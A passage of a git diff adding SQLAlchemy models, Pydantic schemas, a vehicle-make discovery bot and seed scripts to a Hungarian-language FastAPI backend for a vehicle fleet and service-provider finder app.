ForeignKey("data.organizations.id", ondelete="CASCADE")) + user_id = Column(Integer, ForeignKey("data.users.id", ondelete="CASCADE")) + # Itt is frissítjük a hivatkozást + role = Column(Enum(OrgUserRole), default=OrgUserRole.DRIVER) + + is_permanent = Column(Boolean, default=False) + + organization = relationship("Organization", back_populates="members") + # # # user = relationship("User", back_populates="memberships") \ No newline at end of file diff --git a/backend/app/models/social.py b/backend/app/models/social.py new file mode 100755 index 0000000..7d9f19f --- /dev/null +++ b/backend/app/models/social.py @@ -0,0 +1,71 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Text, UniqueConstraint +from app.db.base import Base +from datetime import datetime + +# Enums (már schema="data" beállítással a biztonságért) +class ModerationStatus(str, enum.Enum): + pending = "pending" + approved = "approved" + rejected = "rejected" + +class SourceType(str, enum.Enum): + manual = "manual" + ocr = "ocr" + api_import = "import" + +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + address = Column(String, nullable=False) + category = Column(String) + + status = Column(Enum(ModerationStatus, schema="data", name="moderation_status_enum"), default=ModerationStatus.pending, nullable=False) + source = Column(Enum(SourceType, schema="data", name="source_type_enum"), default=SourceType.manual, nullable=False) + + # --- ÚJ MEZŐ --- + validation_score = Column(Integer, default=0) # A közösségi szavazatok összege + # --------------- + + evidence_image_path = Column(String, nullable=True) + added_by_user_id = Column(Integer, ForeignKey("data.users.id")) + created_at = Column(DateTime, default=datetime.utcnow) + +class Vote(Base): + __tablename__ = "votes" + __table_args__ = ( + UniqueConstraint('user_id', 'provider_id', name='uq_user_provider_vote'), + {"schema": "data"} + ) + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + provider_id = Column(Integer, ForeignKey("data.service_providers.id"), nullable=False) + vote_value = Column(Integer, nullable=False) # +1 vagy -1 + +class Competition(Base): + __tablename__ = "competitions" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + name = Column(String, nullable=False) # Pl: "Januári Feltöltő Verseny" + description = Column(Text) + start_date = Column(DateTime, nullable=False) + end_date = Column(DateTime, nullable=False) + is_active = Column(Boolean, default=True) + +class UserScore(Base): + __tablename__ = "user_scores" + __table_args__ = ( + UniqueConstraint('user_id', 'competition_id', name='uq_user_competition_score'), + {"schema": "data"} + ) + + id = Column(Integer, primary_key=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + competition_id = Column(Integer, ForeignKey("data.competitions.id")) + points = Column(Integer, default=0) + last_updated = Column(DateTime, default=datetime.utcnow) \ No newline at end of file diff --git a/backend/app/models/staged_data.py b/backend/app/models/staged_data.py new file mode 100755 index 0000000..36bcea1 --- /dev/null +++ b/backend/app/models/staged_data.py @@ -0,0 +1,17 @@ +from sqlalchemy import Column, Integer, String, JSON, DateTime, func +from app.db.base import Base + +class StagedVehicleData(Base): + """Ide érkeznek a nyers, validálatlan adatok a külső forrásokból""" + __tablename__ = "staged_vehicle_data" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True) + source_url = Column(String) # Honnan jött az adat? + raw_data = Column(JSON) # A teljes leszedett JSON struktúra + + # Feldolgozási állapot + status = Column(String, default="PENDING") # PENDING, PROCESSED, ERROR + error_log = Column(String, nullable=True) + + created_at = Column(DateTime(timezone=True), server_default=func.now()) \ No newline at end of file diff --git a/backend/app/models/system_settings.py b/backend/app/models/system_settings.py new file mode 100755 index 0000000..ce34a6f --- /dev/null +++ b/backend/app/models/system_settings.py @@ -0,0 +1,15 @@ +from sqlalchemy import Column, String, JSON +from app.db.base import Base + +class SystemSetting(Base): + """ + Globális rendszerbeállítások tárolása. + Kulcs-Érték párok (JSON támogatással a komplex szabályokhoz). + Példa: key='FREE_VEHICLE_LIMIT', value='2' + """ + __tablename__ = "system_settings" + __table_args__ = {"schema": "data"} + + key = Column(String, primary_key=True, index=True) + value = Column(JSON, nullable=False) + description = Column(String, nullable=True) \ No newline at end of file diff --git a/backend/app/models/translation.py b/backend/app/models/translation.py new file mode 100755 index 0000000..a1f1b5a --- /dev/null +++ b/backend/app/models/translation.py @@ -0,0 +1,15 @@ +from sqlalchemy import Column, Integer, String, Text, Boolean, UniqueConstraint +from app.db.base import Base + +class Translation(Base): + __tablename__ = "translations" + __table_args__ = ( + UniqueConstraint("key", "lang_code", name="uq_translation_key_lang"), + {"schema": "data"} + ) + + id = Column(Integer, primary_key=True, index=True) + key = Column(String(100), nullable=False, index=True) + lang_code = Column(String(5), nullable=False, index=True) + value = Column(Text, nullable=False) + is_published = Column(Boolean, default=False) # Publikálási állapot diff --git a/backend/app/models/user.py b/backend/app/models/user.py new file mode 100755 index 0000000..7b20eff --- /dev/null +++ b/backend/app/models/user.py @@ -0,0 +1,35 @@ +import enum +from sqlalchemy import Column, Integer, String, Boolean, Date, DateTime +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +from app.db.base import Base + +class UserRole(str, enum.Enum): + ADMIN = "admin" + USER = "user" + SERVICE = "service" + FLEET_MANAGER = "fleet_manager" + +class User(Base): + __tablename__ = "users" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + email = Column(String, unique=True, index=True, nullable=False) + hashed_password = Column(String, nullable=False) + first_name = Column(String) + last_name = Column(String) + birthday = Column(Date, nullable=True) + role = Column(String, default=UserRole.USER) + is_active = Column(Boolean, default=True) + is_superuser = Column(Boolean, default=False) + is_company = Column(Boolean, default=False) + company_name = Column(String, nullable=True) + tax_number = Column(String, nullable=True) + region_code = Column(String, default="HU") + created_at = Column(DateTime(timezone=True), server_default=func.now()) + updated_at = Column(DateTime(timezone=True), onupdate=func.now()) + + # Kapcsolatok + # memberships = relationship("OrganizationMember", back_populates="user", cascade="all, delete-orphan") + # vehicles = relationship("VehicleOwnership", back_populates="user", cascade="all, delete-orphan") diff --git a/backend/app/models/vehicle.py b/backend/app/models/vehicle.py new file mode 100755 index 0000000..8cf29b4 --- /dev/null +++ b/backend/app/models/vehicle.py @@ -0,0 +1,77 @@ +from sqlalchemy import Column, Integer, String, Boolean, ForeignKey, Numeric, DateTime, JSON, Date +from sqlalchemy.dialects.postgresql import UUID +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +import uuid +from app.db.base import Base + +class VehicleBrand(Base): + __tablename__ = "vehicle_brands" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True, index=True) + name = Column(String(100), nullable=False, unique=True) + slug = Column(String(100), unique=True) + country_of_origin = Column(String(50)) + is_active = Column(Boolean, default=True) + +class ServiceProvider(Base): + __tablename__ = "service_providers" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True, index=True) + name = Column(String(255), nullable=False) + official_brand_partner = Column(Boolean, default=False) + technical_rating_pct = Column(Integer, default=80) + social_rating_pct = Column(Integer, default=80) + location_city = Column(String(100)) + service_type = Column(String(50)) + search_tags = Column(String) + latitude = Column(Numeric(10, 8)) + longitude = Column(Numeric(11, 8)) + is_active = Column(Boolean, default=True) + records = relationship("ServiceRecord", back_populates="provider") + +class EngineSpec(Base): + __tablename__ = "engine_specs" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True, index=True) + engine_code = Column(String(50), unique=True) + fuel_type = Column(String(20)) + power_kw = Column(Integer) + default_service_interval_km = Column(Integer, default=15000) + vehicles = relationship("Vehicle", back_populates="engine_spec") + +class Vehicle(Base): + __tablename__ = "vehicles" + __table_args__ = {"schema": "data"} + id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) + current_company_id = Column(Integer, ForeignKey("data.companies.id")) + brand_id = Column(Integer, ForeignKey("data.vehicle_brands.id")) + model_name = Column(String(100)) + engine_spec_id = Column(Integer, ForeignKey("data.engine_specs.id")) + identification_number = Column(String(50), unique=True) + license_plate = Column(String(20)) + tracking_mode = Column(String(10), default="km") + current_rating_pct = Column(Integer, default=100) + total_real_usage = Column(Numeric(15, 2), default=0) + created_at = Column(DateTime(timezone=True), server_default=func.now()) + engine_spec = relationship("EngineSpec", back_populates="vehicles") + service_records = relationship("ServiceRecord", back_populates="vehicle", cascade="all, delete-orphan") + +# --- KOMPATIBILITÁSI RÉTEG A RÉGI KÓDOKHOZ --- +VehicleOwnership = Vehicle +VehicleModel = Vehicle +VehicleVariant = Vehicle +VehicleCategory = VehicleBrand # JAVÍTVA: Nagy "B" betűvel + +class ServiceRecord(Base): + __tablename__ = "service_records" + __table_args__ = {"schema": "data"} + id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) + vehicle_id = Column(UUID(as_uuid=True), ForeignKey("data.vehicles.id")) + provider_id = Column(Integer, ForeignKey("data.service_providers.id")) + service_date = Column(Date, nullable=False) + usage_value = Column(Numeric(15, 2)) + repair_quality_pct = Column(Integer, default=100) + + vehicle = relationship("Vehicle", back_populates="service_records") + provider = relationship("ServiceProvider", back_populates="records") # JAVÍTVA \ No newline at end of file diff --git a/backend/app/models/vehicle_catalog.py b/backend/app/models/vehicle_catalog.py new file mode 100755 index 0000000..587e9a1 --- /dev/null +++ b/backend/app/models/vehicle_catalog.py @@ -0,0 +1,54 @@ +from sqlalchemy import Column, Integer, String, ForeignKey, Boolean, Float, JSON, Date +from sqlalchemy.orm import relationship +from app.db.base import Base + +# 1. Kategória (Autó, Motor, Kisteher...) +class VehicleCategory(Base): + __tablename__ = "vehicle_categories" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + name_key = Column(String, nullable=False) # i18n kulcs: 'CAR', 'MOTORCYCLE' + +# 2. Márka (Audi, Honda, BMW...) +class VehicleMake(Base): + __tablename__ = "vehicle_makes" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + name = Column(String, unique=True, nullable=False) + logo_url = Column(String, nullable=True) + +# 3. Modell és Generáció (pl. Audi A3 -> A3 8V) +class VehicleModel(Base): + __tablename__ = "vehicle_models" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + make_id = Column(Integer, ForeignKey("data.vehicle_makes.id")) + category_id = Column(Integer, ForeignKey("data.vehicle_categories.id")) + name = Column(String, nullable=False) + generation_name = Column(String, nullable=True) # pl: "8V Facelift" + production_start_year = Column(Integer, nullable=True) + production_end_year = Column(Integer, nullable=True) + +# 4. Motor és Hajtáslánc (Technikai specifikációk) +class VehicleEngine(Base): + __tablename__ = "vehicle_engines" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + model_id = Column(Integer, ForeignKey("data.vehicle_models.id")) + + engine_code = Column(String, nullable=True) + fuel_type = Column(String, nullable=False) # 'Petrol', 'Diesel', 'Hybrid', 'EV' + displacement_ccm = Column(Integer, nullable=True) + power_kw = Column(Integer, nullable=True) + torque_nm = Column(Integer, nullable=True) + transmission_type = Column(String, nullable=True) # 'Manual', 'Automatic' + gears_count = Column(Integer, nullable=True) + drive_type = Column(String, nullable=True) # 'FWD', 'RWD', 'AWD' + +# 5. Opciók Katalógusa (Gyári extrák listája) +class VehicleOptionCatalog(Base): + __tablename__ = "vehicle_options_catalog" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + category = Column(String) # 'Security', 'Comfort', 'Multimedia' + name_key = Column(String) # 'MATRIX_LED' \ No newline at end of file diff --git a/backend/app/models/vehicle_ownership.py b/backend/app/models/vehicle_ownership.py new file mode 100755 index 0000000..b2c53b7 --- /dev/null +++ b/backend/app/models/vehicle_ownership.py @@ -0,0 +1,19 @@ +from sqlalchemy import Column, Integer, ForeignKey, DateTime, Boolean +from sqlalchemy.sql import func +from app.db.base import Base + +class VehicleOwnership(Base): + __tablename__ = "vehicle_ownerships" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + vehicle_id = Column(Integer, ForeignKey("data.vehicles.id")) + org_id = Column(Integer, ForeignKey("data.organizations.id")) + + # Érvényességi időablak + start_date = Column(DateTime(timezone=True), server_default=func.now()) + end_date = Column(DateTime(timezone=True), nullable=True) # Ha eladja, ide kerül a dátum + + is_active = Column(Boolean, default=True) + + # Csak ezen az ablakon belüli szervizeket láthatja az aktuális tulajdonos diff --git a/backend/app/models/verification_token.py b/backend/app/models/verification_token.py new file mode 100755 index 0000000..8357671 --- /dev/null +++ b/backend/app/models/verification_token.py @@ -0,0 +1,21 @@ +import enum +from sqlalchemy import Column, Integer, String, DateTime, ForeignKey, Enum +from sqlalchemy.sql import func +from app.db.base import Base + +class TokenType(str, enum.Enum): + email_verify = "email_verify" + password_reset = "password_reset" + +class VerificationToken(Base): + __tablename__ = "verification_tokens" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + user_id = Column(Integer, ForeignKey("data.users.id", ondelete="CASCADE"), nullable=False) + + token_hash = Column(String(64), unique=True, index=True, nullable=False) + token_type = Column(Enum(TokenType, name="tokentype", schema="data"), nullable=False) + + expires_at = Column(DateTime(timezone=True), nullable=True) + created_at = Column(DateTime(timezone=True), server_default=func.now(), nullable=False) diff --git a/backend/app/old_main.py b/backend/app/old_main.py new file mode 100755 index 0000000..753b877 --- /dev/null +++ b/backend/app/old_main.py @@ -0,0 +1,47 @@ +from fastapi import FastAPI, Request, HTTPException +from fastapi.security.utils import get_authorization_scheme_param +from app.core.config import settings +from app.core.security import decode_token + +from app.api.auth import router as auth_router +from app.api.recommend import router as recommend_router + +app = FastAPI(title="Service Finder API") + +@app.middleware("http") +async def jwt_claims_middleware(request: Request, call_next): + """ + Ha van Authorization: Bearer , akkor claims bekerül request.state.claims-be. + Auth endpointoknál nem kötelező. + """ + auth = request.headers.get("Authorization") + if auth: + scheme, token = get_authorization_scheme_param(auth) + if scheme.lower() == "bearer" and token: + try: + claims = decode_token(token, settings.JWT_SECRET) + if claims.get("type") != "access": + raise HTTPException(status_code=401, detail="Invalid access token type") + request.state.claims = claims + except Exception: + # nem dobunk mindig 401-et, csak a védett endpointoknál; itt “néma” marad + request.state.claims = None + else: + request.state.claims = None + + return await call_next(request) + +@app.get("/health") +def health(): + return {"status": "ok"} + +@app.get("/health/db") +def health_db(): + from app.db.session import get_conn + with get_conn() as conn: + with conn.cursor() as cur: + cur.execute("SELECT 1;") + return {"db": "ok", "result": cur.fetchone()[0]} + +app.include_router(auth_router) +app.include_router(recommend_router) diff --git a/backend/app/schemas/__pycache__/user.cpython-312.pyc b/backend/app/schemas/__pycache__/user.cpython-312.pyc new file mode 100755 index 0000000..b1706c6 Binary files /dev/null and b/backend/app/schemas/__pycache__/user.cpython-312.pyc differ diff --git a/backend/app/schemas/admin.py b/backend/app/schemas/admin.py new file mode 100755 index 0000000..ba7f28b --- /dev/null +++ b/backend/app/schemas/admin.py @@ -0,0 +1,40 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional, Any +from datetime import datetime + +# --- Pontszabályok (Point Rules) --- +class PointRuleBase(BaseModel): + rule_key: str + points: int + region_code: str = "GLOBAL" + start_date: Optional[datetime] = None + end_date: Optional[datetime] = None + is_active: bool = True + +class PointRuleCreate(PointRuleBase): + pass + +class PointRuleResponse(PointRuleBase): + id: int + model_config = ConfigDict(from_attributes=True) + +# --- Regionális Beállítások (MOT, Tax, stb.) --- +class RegionalSettingBase(BaseModel): + region_code: str + setting_key: str + value: Any # JSON adat (pl. {"months": 24}) + start_date: Optional[datetime] = None + end_date: Optional[datetime] = None + +class RegionalSettingCreate(RegionalSettingBase): + pass + +# --- Szintlépési Konfiguráció --- +class LevelConfigBase(BaseModel): + level_number: int + min_points: int + name_translation_key: str + region_code: str = "GLOBAL" + +class LevelConfigUpdate(LevelConfigBase): + pass \ No newline at end of file diff --git a/backend/app/schemas/auth.py b/backend/app/schemas/auth.py new file mode 100755 index 0000000..d95040c --- /dev/null +++ b/backend/app/schemas/auth.py @@ -0,0 +1,16 @@ +from pydantic import BaseModel, EmailStr, Field +from typing import Optional + +class Token(BaseModel): + access_token: str + token_type: str + +class TokenData(BaseModel): + email: Optional[str] = None + +class UserRegister(BaseModel): + email: EmailStr + password: str = Field(..., min_length=8) + full_name: str + region_code: str = "HU" + device_id: str # Az eszköz egyedi azonosítója a védelemhez \ No newline at end of file diff --git a/backend/app/schemas/fleet.py b/backend/app/schemas/fleet.py new file mode 100755 index 0000000..13d3fa5 --- /dev/null +++ b/backend/app/schemas/fleet.py @@ -0,0 +1,56 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional, List +from datetime import date, datetime +from app.models.expense import ExpenseCategory + +# --- Vehicle Schemas --- +class VehicleBase(BaseModel): + license_plate: str + make: str + model: str + year: int + fuel_type: Optional[str] = None + vin: Optional[str] = None + initial_odometer: int = 0 + mot_expiry_date: Optional[date] = None + insurance_expiry_date: Optional[date] = None + +class VehicleCreate(VehicleBase): + pass + +class VehicleResponse(VehicleBase): + id: int + current_odometer: int + created_at: datetime + model_config = ConfigDict(from_attributes=True) + +# --- Event / Expense Schemas --- +class EventBase(BaseModel): + event_type: ExpenseCategory + date: date + odometer_value: int + cost_amount: int + description: Optional[str] = None + is_diy: bool = False + + # Ad-Hoc Provider mező: Ha stringet kapunk, a service megkeresi vagy létrehozza + provider_name: Optional[str] = None + provider_id: Optional[int] = None # Ha már ismert ID-t küldünk + +class EventCreate(EventBase): + pass + +class EventResponse(EventBase): + id: int + vehicle_id: int + odometer_anomaly: bool + service_provider_id: Optional[int] + image_paths: Optional[List[str]] = [] + + model_config = ConfigDict(from_attributes=True) + +class TCOStats(BaseModel): + vehicle_id: int + total_cost: int + breakdown: dict[str, int] # Kategóriánkénti bontás + cost_per_km: Optional[float] = 0.0 \ No newline at end of file diff --git a/backend/app/schemas/social.py b/backend/app/schemas/social.py new file mode 100755 index 0000000..782a364 --- /dev/null +++ b/backend/app/schemas/social.py @@ -0,0 +1,60 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional, List +from datetime import datetime +from app.models.social import ModerationStatus, SourceType + +# --- Alap Sémák --- + +class ServiceProviderBase(BaseModel): + name: str + address: Optional[str] = None + category: Optional[str] = None + source: SourceType = SourceType.manual + +class ServiceProviderCreate(BaseModel): + name: str + address: str + category: Optional[str] = None + +class ServiceProviderResponse(ServiceProviderBase): + id: int + status: ModerationStatus + validation_score: int # Látni kell a pontszámot + evidence_image_path: Optional[str] = None + added_by_user_id: Optional[int] = None + created_at: datetime + + model_config = ConfigDict(from_attributes=True) + +# --- Voting & Gamification Sémák --- + +class VoteCreate(BaseModel): + vote_value: int # Csak a +1 vagy -1 kell, a user_id jön a tokenből, a provider_id az URL-ből + +class LeaderboardEntry(BaseModel): + username: str + points: int + rank: int + + model_config = ConfigDict(from_attributes=True) + + # --- GAMIFIKÁCIÓS SÉMÁK (Amiket a log keresett) --- + +class BadgeSchema(BaseModel): + id: int + name: str + description: str + image_url: Optional[str] = None + + class Config: + from_attributes = True + +class UserStatSchema(BaseModel): + user_id: int + total_points: int + current_level: int + rank_title: str + badges: List[BadgeSchema] = [] + + class Config: + from_attributes = True \ No newline at end of file diff --git a/backend/app/schemas/token.py b/backend/app/schemas/token.py new file mode 100755 index 0000000..a5c685a --- /dev/null +++ b/backend/app/schemas/token.py @@ -0,0 +1,10 @@ +from pydantic import BaseModel +from typing import Optional + +class Token(BaseModel): + access_token: str + token_type: str + +class TokenData(BaseModel): + username: Optional[str] = None + role: Optional[str] = None diff --git a/backend/app/schemas/user.py b/backend/app/schemas/user.py new file mode 100755 index 0000000..833175e --- /dev/null +++ b/backend/app/schemas/user.py @@ -0,0 +1,52 @@ +from pydantic import BaseModel, EmailStr, field_validator, ConfigDict +from typing import Optional +from datetime import date + +# Alap adatok, amik mindenhol kellenek +class UserBase(BaseModel): + email: EmailStr + first_name: Optional[str] = None + last_name: Optional[str] = None + is_active: Optional[bool] = True + is_superuser: bool = False + region_code: str = "HU" + +# --- REGISZTRÁCIÓ --- +class UserRegister(UserBase): + password: str + birthday: Optional[date] = None + is_company: bool = False + company_name: Optional[str] = None + tax_number: Optional[str] = None + + @field_validator('email') + @classmethod + def block_temporary_emails(cls, v: str) -> str: + blacklist = ['mailinator.com', '10minutemail.com', 'temp-mail.org', 'guerrillamail.com'] + domain = v.split('@')[-1].lower() + if domain in blacklist: + raise ValueError('Ideiglenes email szolgáltató nem engedélyezett!') + return v + + @field_validator('tax_number') + @classmethod + def validate_tax_id(cls, v: Optional[str], info) -> Optional[str]: + if info.data.get('is_company') and (not v or len(v) < 8): + raise ValueError('Cég esetén az adószám első 8 karaktere kötelező!') + return v + +# --- VÁLASZ (Ezt hiányolta a rendszer!) --- +class UserResponse(UserBase): + id: int + is_company: bool + company_name: Optional[str] = None + + # Pydantic V2 konfiguráció az ORM (SQLAlchemy) támogatáshoz + model_config = ConfigDict(from_attributes=True) + +# Frissítéshez használt séma +class UserUpdate(BaseModel): + password: Optional[str] = None + first_name: Optional[str] = None + last_name: Optional[str] = None + email: Optional[EmailStr] = None \ No newline at end of file diff --git a/backend/app/schemas/vehicle.py b/backend/app/schemas/vehicle.py new file mode 100755 index 0000000..abcfac0 --- /dev/null +++ b/backend/app/schemas/vehicle.py @@ -0,0 +1,30 @@ +from pydantic import BaseModel, Field, validator +from typing import Optional, List, Any +from uuid import UUID +from datetime import datetime + +class EngineSpecBase(BaseModel): + engine_code: str + fuel_type: str + power_kw: int + default_service_interval_km: int = 15000 + +class VehicleBase(BaseModel): + brand_id: int + model_name: str + identification_number: str + license_plate: Optional[str] = None + tracking_mode: str = "km" + +class VehicleCreate(VehicleBase): + current_company_id: int + engine_spec_id: int + +class VehicleRead(VehicleBase): + id: UUID + current_rating_pct: int + total_real_usage: float + created_at: datetime + + class Config: + from_attributes = True \ No newline at end of file diff --git a/backend/app/scripts/discovery_bot.py b/backend/app/scripts/discovery_bot.py new file mode 100755 index 0000000..87e6be0 --- /dev/null +++ b/backend/app/scripts/discovery_bot.py @@ -0,0 +1,38 @@ +import asyncio +import httpx +from sqlalchemy import text +from app.db.session import engine +from datetime import datetime + +async def log_discovery(conn, category, brand, model, action): + await conn.execute(text(""" + INSERT INTO data.bot_discovery_logs (category, brand_name, model_name, action_taken) + VALUES (:c, :b, :m, :a) + """), {"c": category, "b": brand, "m": model, "a": action}) + +async def run_discovery(): + async with engine.begin() as conn: + print(f"🚀 Jármű felfedezés indul: {datetime.now()}") + + # Jelenleg a CAR kategóriára fókuszálunk egy külső API segítségével (pl. NHTSA - Ingyenes) + # Itt egy példa, hogyan bővül dinamikusan a rendszer + async with httpx.AsyncClient() as client: + # Autók lekérése + response = await client.get("https://vpic.nhtsa.dot.gov/api/vehicles/getallmakes?format=json") + if response.status_code == 200: + makes = response.json().get('Results', [])[:100] # Tesztként az első 100 + + for make in makes: + brand_name = make['Make_Name'].strip() + # Megnézzük, megvan-e már + res = await conn.execute(text("SELECT id FROM data.vehicle_brands WHERE name = :n"), {"n": brand_name}) + if not res.scalar(): + await conn.execute(text("INSERT INTO data.vehicle_brands (category_id, name) VALUES (1, :n)"), {"n": brand_name}) + await log_discovery(conn, "CAR", brand_name, "ALL", "NEW_BRAND") + print(f"✨ Új márka találva: {brand_name}") + + await conn.commit() + print("✅ Bot futása befejeződött.") + +if __name__ == "__main__": + asyncio.run(run_discovery()) \ No newline at end of file diff --git a/backend/app/seed_catalog.py b/backend/app/seed_catalog.py new file mode 100755 index 0000000..be88c86 --- /dev/null +++ b/backend/app/seed_catalog.py @@ -0,0 +1,23 @@ +import asyncio +from sqlalchemy.ext.asyncio import AsyncSession +from app.db.session import AsyncSessionLocal +from app.models.vehicle_catalog import VehicleCategory, VehicleMake + +async def quick_seed(): + async with AsyncSessionLocal() as db: + print("🌱 Alapkategóriák és márkák feltöltése...") + + # 1. Kategóriák + cats = [VehicleCategory(name_key="CAR"), VehicleCategory(name_key="MOTORCYCLE"), VehicleCategory(name_key="LCV")] + db.add_all(cats) + + # 2. Top Márkák (induláshoz) + makes = ["Audi", "BMW", "Honda", "Skoda", "Volkswagen", "Toyota", "Ford", "Yamaha", "Suzuki"] + for m_name in makes: + db.add(VehicleMake(name=m_name)) + + await db.commit() + print("✅ Kész! Most már van mihez modellt rendelni.") + +if __name__ == "__main__": + asyncio.run(quick_seed()) \ No newline at end of file diff --git a/backend/app/seed_data.py b/backend/app/seed_data.py new file mode 100755 index 0000000..c6e715b --- /dev/null +++ b/backend/app/seed_data.py @@ -0,0 +1,118 @@ +import asyncio +import sys +import os + +# Útvonal beállítása +sys.path.append(os.path.join(os.path.dirname(__file__), '..')) + +# --- JAVÍTÁS 1: A Helyes Aszinkron Session Importálása --- +from app.db.session import AsyncSessionLocal +# --------------------------------------------------------- + +from app.models.user import User +from app.models.social import ServiceProvider, Competition, ModerationStatus +from app.services.social_service import vote_for_provider +from sqlalchemy import text +from datetime import datetime, timedelta + +async def run_simulation(): + # --- JAVÍTÁS 2: Itt is az AsyncSessionLocal-t használjuk --- + async with AsyncSessionLocal() as db: + # ----------------------------------------------------------- + print("--- 1. TAKARÍTÁS (Előző tesztadatok törlése) ---") + # Kaszkádolt törlés a data sémában + await db.execute(text("TRUNCATE TABLE data.user_scores, data.votes, data.service_providers, data.competitions, data.users RESTART IDENTITY CASCADE")) + await db.commit() + + print("\n--- 2. SZEREPLŐK LÉTREHOZÁSA ---") + # Admin + admin = User(email="admin@test.com", password_hash="hash", full_name="Admin", is_superuser=True) + # Jófiú (aki valós boltokat tölt fel) + good_user = User(email="good@test.com", password_hash="hash", full_name="Good Guy", reputation_score=5) + # Rosszfiú (aki fake boltokat tölt fel) + bad_user = User(email="bad@test.com", password_hash="hash", full_name="Spammer", reputation_score=-8) # Közel a banhoz + # Szavazóközönség + voter1 = User(email="voter1@test.com", password_hash="hash", full_name="Voter 1") + voter2 = User(email="voter2@test.com", password_hash="hash", full_name="Voter 2") + voter3 = User(email="voter3@test.com", password_hash="hash", full_name="Voter 3") + voter4 = User(email="voter4@test.com", password_hash="hash", full_name="Voter 4") + voter5 = User(email="voter5@test.com", password_hash="hash", full_name="Voter 5") + + db.add_all([admin, good_user, bad_user, voter1, voter2, voter3, voter4, voter5]) + await db.commit() + + # ID-k lekérése + for u in [good_user, bad_user, voter1, voter2, voter3, voter4, voter5]: + await db.refresh(u) + + print("\n--- 3. VERSENY INDÍTÁSA ---") + race = Competition( + name="Nagy Januári Verseny", + description="Töltsd fel a legtöbb boltot!", + start_date=datetime.utcnow() - timedelta(days=1), + end_date=datetime.utcnow() + timedelta(days=30), + is_active=True + ) + db.add(race) + await db.commit() + await db.refresh(race) + + print("\n--- 4. SZCENÁRIÓ A: A JÓ FELHASZNÁLÓ ---") + # Good Guy feltölt egy boltot + good_shop = ServiceProvider( + name="Korrekt Gumiszerviz", + address="Fő utca 1.", + added_by_user_id=good_user.id, + status=ModerationStatus.pending + ) + db.add(good_shop) + await db.commit() + await db.refresh(good_shop) + + # A tömeg megszavazza (Kell 5 pont az elfogadáshoz) + print(f"Szavazás a '{good_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, good_shop.id, 1) + await vote_for_provider(db, voter2.id, good_shop.id, 1) + await vote_for_provider(db, voter3.id, good_shop.id, 1) + await vote_for_provider(db, voter4.id, good_shop.id, 1) + await vote_for_provider(db, voter5.id, good_shop.id, 1) # Itt éri el az 5-öt! + + # Eredmény ellenőrzése + await db.refresh(good_user) + print(f"Good Guy Hírneve (Elvárt: 6): {good_user.reputation_score}") + + # Pontszám ellenőrzése + points = await db.execute(text(f"SELECT points FROM data.user_scores WHERE user_id={good_user.id}")) + scalar_points = points.scalar() + print(f"Good Guy Verseny Pontjai (Elvárt: 10): {scalar_points}") + + print("\n--- 5. SZCENÁRIÓ B: A ROSSZ FELHASZNÁLÓ (AUTO-BAN TESZT) ---") + # Bad Guy feltölt egy fake boltot + fake_shop = ServiceProvider( + name="KAMU Bolt", + address="Nincs ilyen utca", + added_by_user_id=bad_user.id, + status=ModerationStatus.pending + ) + db.add(fake_shop) + await db.commit() + await db.refresh(fake_shop) + + # A tömeg leszavazza (Kell -3 az elutasításhoz) + print(f"Szavazás a '{fake_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, fake_shop.id, -1) + await vote_for_provider(db, voter2.id, fake_shop.id, -1) + await vote_for_provider(db, voter3.id, fake_shop.id, -1) # Itt éri el a -3-at! + + # Eredmény ellenőrzése + await db.refresh(bad_user) + print(f"Bad User Hírneve (Elvárt: -10): {bad_user.reputation_score}") + print(f"Bad User Aktív? (Elvárt: False/Banned): {bad_user.is_active}") + + if not bad_user.is_active: + print("✅ SIKER: A rendszer automatikusan kitiltotta a csalót!") + else: + print("❌ HIBA: A felhasználó még mindig aktív.") + +if __name__ == "__main__": + asyncio.run(run_simulation()) \ No newline at end of file diff --git a/backend/app/seed_honda.py b/backend/app/seed_honda.py new file mode 100755 index 0000000..fa326bb --- /dev/null +++ b/backend/app/seed_honda.py @@ -0,0 +1,46 @@ +import asyncio +from sqlalchemy import text +from app.db.session import SessionLocal + +async def seed(): + async with SessionLocal() as db: + print("🚀 Honda adatok betöltése...") + + # 1. Kategóriák (Autó, Motor) - Sima idézőjelekkel a SQL-ben + await db.execute(text(""" + INSERT INTO data.vehicle_categories (name, slug) + VALUES (\u0027Személyautó\u0027, \u0027car\u0027), (\u0027Motorkerékpár\u0027, \u0027motorcycle\u0027) + ON CONFLICT (slug) DO NOTHING + """)) + + # 2. Márka: Honda + res = await db.execute(text(""" + INSERT INTO data.vehicle_brands (name, slug, country_code) + VALUES (\u0027Honda\u0027, \u0027honda\u0027, \u0027JP\u0027) + ON CONFLICT (slug) DO UPDATE SET name = EXCLUDED.name + RETURNING id + """)) + brand_id = res.fetchone()[0] + + # 3. Modellek listája + models = [ + ("Civic", "civic"), + ("Accord", "accord"), + ("CR-V", "cr-v"), + ("Jazz", "jazz"), + ("HR-V", 